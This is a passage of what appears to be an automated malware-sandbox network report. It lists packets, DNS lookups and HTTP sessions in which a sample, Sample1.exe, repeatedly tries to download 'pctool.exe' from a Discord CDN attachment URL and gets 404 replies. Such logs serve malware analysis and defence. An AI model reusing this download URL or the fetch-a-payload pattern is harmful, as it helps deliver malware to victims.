                        Jan 15, 2025 15:20:43.723360062 CET49749443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:20:43.723396063 CET44349749162.159.134.233192.168.2.25
                        Jan 15, 2025 15:20:43.861259937 CET44349749162.159.134.233192.168.2.25
                        Jan 15, 2025 15:20:43.861331940 CET44349749162.159.134.233192.168.2.25
                        Jan 15, 2025 15:20:43.861489058 CET49749443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:20:43.862065077 CET49749443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:20:48.875426054 CET49750443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:20:48.875467062 CET44349750162.159.134.233192.168.2.25
                        Jan 15, 2025 15:20:48.875613928 CET49750443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:20:48.875919104 CET49750443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:20:48.875933886 CET44349750162.159.134.233192.168.2.25
                        Jan 15, 2025 15:20:49.332915068 CET44349750162.159.134.233192.168.2.25
                        Jan 15, 2025 15:20:49.355331898 CET49750443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:20:49.355345964 CET44349750162.159.134.233192.168.2.25
                        Jan 15, 2025 15:20:49.470787048 CET44349750162.159.134.233192.168.2.25
                        Jan 15, 2025 15:20:49.470850945 CET44349750162.159.134.233192.168.2.25
                        Jan 15, 2025 15:20:49.478257895 CET49750443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:20:49.482832909 CET49750443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:20:54.487901926 CET49751443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:20:54.487960100 CET44349751162.159.134.233192.168.2.25
                        Jan 15, 2025 15:20:54.488341093 CET49751443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:20:54.488703966 CET49751443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:20:54.488720894 CET44349751162.159.134.233192.168.2.25
                        Jan 15, 2025 15:20:55.076354980 CET44349751162.159.134.233192.168.2.25
                        Jan 15, 2025 15:20:55.077958107 CET49751443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:20:55.077999115 CET44349751162.159.134.233192.168.2.25
                        Jan 15, 2025 15:20:55.238454103 CET44349751162.159.134.233192.168.2.25
                        Jan 15, 2025 15:20:55.238517046 CET44349751162.159.134.233192.168.2.25
                        Jan 15, 2025 15:20:55.238569975 CET49751443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:20:55.239151001 CET49751443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:00.250893116 CET49755443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:00.250930071 CET44349755162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:00.250998020 CET49755443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:00.252049923 CET49755443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:00.252063036 CET44349755162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:00.755834103 CET44349755162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:00.757452011 CET49755443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:00.757482052 CET44349755162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:00.915502071 CET44349755162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:00.915570974 CET44349755162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:00.915620089 CET49755443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:00.916240931 CET49755443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:05.923739910 CET49757443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:05.923851013 CET44349757162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:05.923976898 CET49757443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:05.924329042 CET49757443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:05.924375057 CET44349757162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:06.377069950 CET44349757162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:06.390872002 CET49757443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:06.390961885 CET44349757162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:06.530364037 CET44349757162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:06.530425072 CET44349757162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:06.530482054 CET49757443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:06.542407990 CET49757443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:11.548736095 CET49760443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:11.548794031 CET44349760162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:11.548887968 CET49760443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:11.549151897 CET49760443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:11.549170017 CET44349760162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:12.023483992 CET44349760162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:12.025027037 CET49760443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:12.025051117 CET44349760162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:12.188699961 CET44349760162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:12.188751936 CET44349760162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:12.188910961 CET49760443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:12.189508915 CET49760443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:17.205454111 CET49761443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:17.205508947 CET44349761162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:17.205627918 CET49761443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:17.205912113 CET49761443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:17.205921888 CET44349761162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:17.686233044 CET44349761162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:17.687823057 CET49761443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:17.687863111 CET44349761162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:17.839530945 CET44349761162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:17.839608908 CET44349761162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:17.839904070 CET49761443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:17.840852976 CET49761443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:22.845237970 CET49762443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:22.845294952 CET44349762162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:22.845397949 CET49762443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:22.845791101 CET49762443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:22.845808029 CET44349762162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:23.314791918 CET44349762162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:23.316097975 CET49762443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:23.316133022 CET44349762162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:23.438607931 CET44349762162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:23.438694954 CET44349762162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:23.438771009 CET49762443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:23.441231966 CET49762443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:28.454643965 CET49765443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:28.454689026 CET44349765162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:28.454790115 CET49765443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:28.455451965 CET49765443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:28.455466986 CET44349765162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:28.939367056 CET44349765162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:28.954863071 CET49765443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:28.954912901 CET44349765162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:29.086072922 CET44349765162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:29.086150885 CET44349765162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:29.086208105 CET49765443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:29.087042093 CET49765443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:34.095412970 CET49766443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:34.095462084 CET44349766162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:34.095603943 CET49766443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:34.096002102 CET49766443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:34.096014977 CET44349766162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:34.558499098 CET44349766162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:34.559926033 CET49766443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:34.559962034 CET44349766162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:34.705068111 CET44349766162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:34.705152988 CET44349766162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:34.705199957 CET49766443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:34.705682039 CET49766443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:39.720493078 CET49767443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:39.720561028 CET44349767162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:39.720662117 CET49767443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:39.721086025 CET49767443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:39.721105099 CET44349767162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:40.207102060 CET44349767162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:40.208895922 CET49767443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:40.208936930 CET44349767162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:40.342513084 CET44349767162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:40.342679024 CET44349767162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:40.342757940 CET49767443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:40.343221903 CET49767443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:45.352475882 CET49768443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:45.352540970 CET44349768162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:45.352650881 CET49768443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:45.353039026 CET49768443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:45.353049994 CET44349768162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:45.857256889 CET44349768162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:45.859039068 CET49768443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:45.859066963 CET44349768162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:46.012118101 CET44349768162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:46.012188911 CET44349768162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:46.012238026 CET49768443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:46.012903929 CET49768443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:51.021147966 CET49773443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:51.021248102 CET44349773162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:51.021354914 CET49773443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:51.022145987 CET49773443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:51.022181988 CET44349773162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:51.493000031 CET44349773162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:51.499052048 CET49773443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:51.499106884 CET44349773162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:51.634990931 CET44349773162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:51.635164976 CET44349773162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:51.639342070 CET44349773162.159.134.233192.168.2.25
                        Jan 15, 2025 15:21:51.639483929 CET49773443192.168.2.25162.159.134.233
                        Jan 15, 2025 15:21:52.094378948 CET49773443192.168.2.25162.159.134.233
                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                        Jan 15, 2025 15:18:48.602514029 CET | 56959 | 53 | 192.168.2.25 | 1.1.1.1
                        Jan 15, 2025 15:18:48.609025002 CET | 53 | 56959 | 1.1.1.1 | 192.168.2.25
                        Jan 15, 2025 15:21:47.699126959 CET | 63865 | 53 | 192.168.2.25 | 1.1.1.1
                        Jan 15, 2025 15:21:57.471528053 CET | 63865 | 53 | 192.168.2.25 | 1.1.1.1
                        Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                        Jan 15, 2025 15:18:48.602514029 CET | 192.168.2.25 | 1.1.1.1 | 0x83ee | Standard query (0) | cdn.discordapp.com | A (IP address) | IN (0x0001) | false
                        Jan 15, 2025 15:21:47.699126959 CET | 192.168.2.25 | 1.1.1.1 | 0xcb27 | Standard query (0) | assets.msn.com | A (IP address) | IN (0x0001) | false
                        Jan 15, 2025 15:21:57.471528053 CET | 192.168.2.25 | 1.1.1.1 | 0xe92d | Standard query (0) | browser.events.data.msn.cn | A (IP address) | IN (0x0001) | false
                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                        Jan 15, 2025 15:18:42.067709923 CET | 1.1.1.1 | 192.168.2.25 | 0xc9d2 | No error (0) | bg.microsoft.map.fastly.net |  | 199.232.214.172 | A (IP address) | IN (0x0001) | false
                        Jan 15, 2025 15:18:42.067709923 CET | 1.1.1.1 | 192.168.2.25 | 0xc9d2 | No error (0) | bg.microsoft.map.fastly.net |  | 199.232.210.172 | A (IP address) | IN (0x0001) | false
                        Jan 15, 2025 15:18:48.609025002 CET | 1.1.1.1 | 192.168.2.25 | 0x83ee | No error (0) | cdn.discordapp.com |  | 162.159.134.233 | A (IP address) | IN (0x0001) | false
                        Jan 15, 2025 15:18:48.609025002 CET | 1.1.1.1 | 192.168.2.25 | 0x83ee | No error (0) | cdn.discordapp.com |  | 162.159.133.233 | A (IP address) | IN (0x0001) | false
                        Jan 15, 2025 15:18:48.609025002 CET | 1.1.1.1 | 192.168.2.25 | 0x83ee | No error (0) | cdn.discordapp.com |  | 162.159.135.233 | A (IP address) | IN (0x0001) | false
                        Jan 15, 2025 15:18:48.609025002 CET | 1.1.1.1 | 192.168.2.25 | 0x83ee | No error (0) | cdn.discordapp.com |  | 162.159.129.233 | A (IP address) | IN (0x0001) | false
                        Jan 15, 2025 15:18:48.609025002 CET | 1.1.1.1 | 192.168.2.25 | 0x83ee | No error (0) | cdn.discordapp.com |  | 162.159.130.233 | A (IP address) | IN (0x0001) | false
                        Jan 15, 2025 15:21:47.705893040 CET | 1.1.1.1 | 192.168.2.25 | 0xcb27 | No error (0) | assets.msn.com | assets.msn.com.edgekey.net |  | CNAME (Canonical name) | IN (0x0001) | false
                        Jan 15, 2025 15:21:57.478562117 CET | 1.1.1.1 | 192.168.2.25 | 0xe92d | No error (0) | browser.events.data.msn.cn | global.asimov.events.data.trafficmanager.net |  | CNAME (Canonical name) | IN (0x0001) | false
                        • cdn.discordapp.com
                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        0 | 192.168.2.25 | 49724 | 162.159.134.233 | 443 | 8064 | C:\Users\user\Desktop\Sample1.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-15 14:18:50 UTC | 128 | OUT | GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
                        Host: cdn.discordapp.com
                        Connection: Keep-Alive
                        2025-01-15 14:18:50 UTC | 1047 | IN | HTTP/1.1 404 Not Found
                        Date: Wed, 15 Jan 2025 14:18:50 GMT
                        Content-Type: text/plain;charset=UTF-8
                        Content-Length: 36
                        Connection: close
                        Set-Cookie: __cf_bm=X7ypTZTEe3FS6ntDcrLVkieFIGLyMnWqCWZbbyNseHE-1736950730-1.0.1.1-likCCWH0Q3yYZ6FO1WQd1bbYEd4g5Y1gK7QgTl5BNgWEF1Hf9EZgevojPYP8qoum1CfC6LCAACww6gAuPaOygg; path=/; expires=Wed, 15-Jan-25 14:48:50 GMT; domain=.discordapp.com; HttpOnly; Secure
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Es%2FdW%2FY14VFucDKBS72G8XCQ6MjEsgU%2B9gRwWVjvoVstzjj4zCAKiPTuok0W7XcanjENsHojotNuwDiYQyONyM6TAub21ZCkl92Bm4SmOwgjtCN9H31rKuE2hPrMpRd0Yvvm0Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                        Set-Cookie: _cfuvid=GLR.n09ePR8wKJpZKQOcpwthnOqAoRzDPG27pjOMP5M-1736950730258-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                        Server: cloudflare
                        CF-RAY: 90267f4fdd3d41e7-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-01-15 14:18:50 UTC | 36 | IN | Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                        Data Ascii: This content is no longer available.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        1 | 192.168.2.25 | 49725 | 162.159.134.233 | 443 | 8064 | C:\Users\user\Desktop\Sample1.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-15 14:18:56 UTC | 104 | OUT | GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
                        Host: cdn.discordapp.com
                        2025-01-15 14:18:56 UTC | 1049 | IN | HTTP/1.1 404 Not Found
                        Date: Wed, 15 Jan 2025 14:18:56 GMT
                        Content-Type: text/plain;charset=UTF-8
                        Content-Length: 36
                        Connection: close
                        Set-Cookie: __cf_bm=sPZ._gvZuiMsNC1n96Ew5M8C1UyphFYGF.7LtT3BzbQ-1736950736-1.0.1.1-9s7iaqaXP0mJn8UO0Tc5xnADY7mfwfn8HAIp31aF2QOpBezGeXHRvvU7wWZQjF652R075AM5d9iZjnolT1ftng; path=/; expires=Wed, 15-Jan-25 14:48:56 GMT; domain=.discordapp.com; HttpOnly; Secure
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z1kp3rZeL76F6b4n9wjFiAeE1XDTJXRDqI78XT20UV%2BOodmhJF%2Bg4cb%2FHqdLN5XIWgIflP44RMLOGIJBgNFkvlMQ5WQtj%2B8K0Y05bLtNhvYjUbGX2nCRLbS19XPf93VxHEiOdw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                        Set-Cookie: _cfuvid=SQe4d2dytBuhz3b7tvK8tGYIrzXfAv6vBzbIWTzU2HQ-1736950736123-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                        Server: cloudflare
                        CF-RAY: 90267f74ad5a41d3-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-01-15 14:18:56 UTC | 36 | IN | Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                        Data Ascii: This content is no longer available.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        2 | 192.168.2.25 | 49726 | 162.159.134.233 | 443 | 8064 | C:\Users\user\Desktop\Sample1.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-15 14:19:01 UTC | 104 | OUT | GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
                        Host: cdn.discordapp.com
                        2025-01-15 14:19:01 UTC | 1045 | IN | HTTP/1.1 404 Not Found
                        Date: Wed, 15 Jan 2025 14:19:01 GMT
                        Content-Type: text/plain;charset=UTF-8
                        Content-Length: 36
                        Connection: close
                        Set-Cookie: __cf_bm=vjKnbeyi0TI4kfIxj6mjPCAbJrqRMkAIJ_xSJEapyos-1736950741-1.0.1.1-bstkEOAXd52awHCodGlKdwmjNpF23s3tAvxhzveMTZaAkUvUCMtuY7czgcABYDiHqXqD1iJuOss56FVuvx771A; path=/; expires=Wed, 15-Jan-25 14:49:01 GMT; domain=.discordapp.com; HttpOnly; Secure
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lnca4oAFgsjacK0sn5i5m91LAv9Z8lOWc%2BWSiQEqg6BauUcsSSJm1JcCGiSrmx4AwGRYET7RRNc0JR0OjEgTK6EJYoZQr73rofRCcBrs713za0TcdE%2FtVMiJMrMc12kp4mHoTw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                        Set-Cookie: _cfuvid=5tm_VWzg3O0_T7.Qm_PSiBVUTsYz44y81LD73x1DT24-1736950741785-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                        Server: cloudflare
                        CF-RAY: 90267f981e56f799-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-01-15 14:19:01 UTC | 36 | IN | Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                        Data Ascii: This content is no longer available.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        3 | 192.168.2.25 | 49728 | 162.159.134.233 | 443 | 8064 | C:\Users\user\Desktop\Sample1.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-15 14:19:07 UTC | 104 | OUT | GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
                        Host: cdn.discordapp.com
                        2025-01-15 14:19:07 UTC | 1047 | IN | HTTP/1.1 404 Not Found
                        Date: Wed, 15 Jan 2025 14:19:07 GMT
                        Content-Type: text/plain;charset=UTF-8
                        Content-Length: 36
                        Connection: close
                        Set-Cookie: __cf_bm=tZGLutk0LFGV2qTE_YtsK1Ahp3kQ8T1ERueJsI.J1LQ-1736950747-1.0.1.1-Ke1mlI3InrdrQndQh6YXpmE9.x9gwgI.6XtAyJg760Iw81oTRbSo_lWJ6dQkeo3AcNeqz1ycVyQXc8bV_ka4Mw; path=/; expires=Wed, 15-Jan-25 14:49:07 GMT; domain=.discordapp.com; HttpOnly; Secure
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GPSob8UWbMprOoalMDEZ2Ahtm3r8FGl9aDBLs%2BYQX0c6ixZJXc%2BY3GhGSsCtQgh99Ze6MwGmDoOQUrK4SwzJwEh2Q0mCDTh%2FueGe6lF9pXU2g7zBgpodyTVaJjk8yNn4T5Ekcw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                        Set-Cookie: _cfuvid=Z9lzIZQM040oveucDtfeTrlMJfknbSPBUtCO5OdGjgI-1736950747441-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                        Server: cloudflare
                        CF-RAY: 90267fbb5977c33c-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-01-15 14:19:07 UTC | 36 | IN | Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                        Data Ascii: This content is no longer available.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        4 | 192.168.2.25 | 49729 | 162.159.134.233 | 443 | 8064 | C:\Users\user\Desktop\Sample1.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-15 14:19:12 UTC | 104 | OUT | GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
                        Host: cdn.discordapp.com
                        2025-01-15 14:19:13 UTC | 1047 | IN | HTTP/1.1 404 Not Found
                        Date: Wed, 15 Jan 2025 14:19:13 GMT
                        Content-Type: text/plain;charset=UTF-8
                        Content-Length: 36
                        Connection: close
                        Set-Cookie: __cf_bm=2m1rSsOEp2Ha_S74ELCRn3VC8gVJnZ0Fdgmfkf7FBc4-1736950753-1.0.1.1-xG9gBGNxNGZmgAohlUov77NM3.QnhZDttAtyFJCFgqdYcp9Zd5d_vhWK3pf9ACJm1U8t4tjNN6iFjkr7RVXbWQ; path=/; expires=Wed, 15-Jan-25 14:49:13 GMT; domain=.discordapp.com; HttpOnly; Secure
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=89dYNmdGL7ZmiCilgBnIugJb8SKyhsV7KNpMyWw2vWK9P%2BDo1%2BScBmFkrZntjl6Kd8DiM%2BKIvce3Su05gdnd8TdvrkjQPNlxRSJQ9QPC8S1DIjdrIYAvq8zhg11K6t1fifDGfA%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                        Set-Cookie: _cfuvid=3Bchd1uF6715knDbZx82swkgk.h2L.O6b8.4V.w9gXI-1736950753065-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                        Server: cloudflare
                        CF-RAY: 90267fde88810f67-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-01-15 14:19:13 UTC | 36 | IN | Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                        Data Ascii: This content is no longer available.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        5 | 192.168.2.25 | 49733 | 162.159.134.233 | 443 | 8064 | C:\Users\user\Desktop\Sample1.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-15 14:19:18 UTC | 104 | OUT | GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
                        Host: cdn.discordapp.com
                        2025-01-15 14:19:18 UTC | 1053 | IN | HTTP/1.1 404 Not Found
                        Date: Wed, 15 Jan 2025 14:19:18 GMT
                        Content-Type: text/plain;charset=UTF-8
                        Content-Length: 36
                        Connection: close
                        Set-Cookie: __cf_bm=TM0WgwnCdWV5EI2EFCI7RetZqJKvnynsHlRAP46Yxd8-1736950758-1.0.1.1-YiqDepsOJEqYWpLHJew0UlftcWASkDedMFJQj_rdTUEhagmeERV3de2yqXbD_jDANOlbKIkjI.FBdriUzZG1Zg; path=/; expires=Wed, 15-Jan-25 14:49:18 GMT; domain=.discordapp.com; HttpOnly; Secure
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YcUQ%2FwjE%2BYeyg%2FCw%2BuU5sC%2BwUzA8edXlfboY3bEHhgoEPeOtGZeAb6Zta3CaZ6mab74IO4Gm2FPlY4QYWvqgoq0QAuzVuztBx3HZ9fCWMFmhmiLrWmE6lF%2BSTP0GBwcDTWN28g%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                        Set-Cookie: _cfuvid=NBBwomD_aWliSeYZYpYtDDbx9eg5La688JlEqij29Xk-1736950758797-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                        Server: cloudflare
                        CF-RAY: 902680025f6a0c9c-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-01-15 14:19:18 UTC | 36 | IN | Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                        Data Ascii: This content is no longer available.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        6 | 192.168.2.25 | 49734 | 162.159.134.233 | 443 | 8064 | C:\Users\user\Desktop\Sample1.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-15 14:19:24 UTC | 104 | OUT | GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
                        Host: cdn.discordapp.com
                        2025-01-15 14:19:24 UTC | 1043 | IN | HTTP/1.1 404 Not Found
                        Date: Wed, 15 Jan 2025 14:19:24 GMT
                        Content-Type: text/plain;charset=UTF-8
                        Content-Length: 36
                        Connection: close
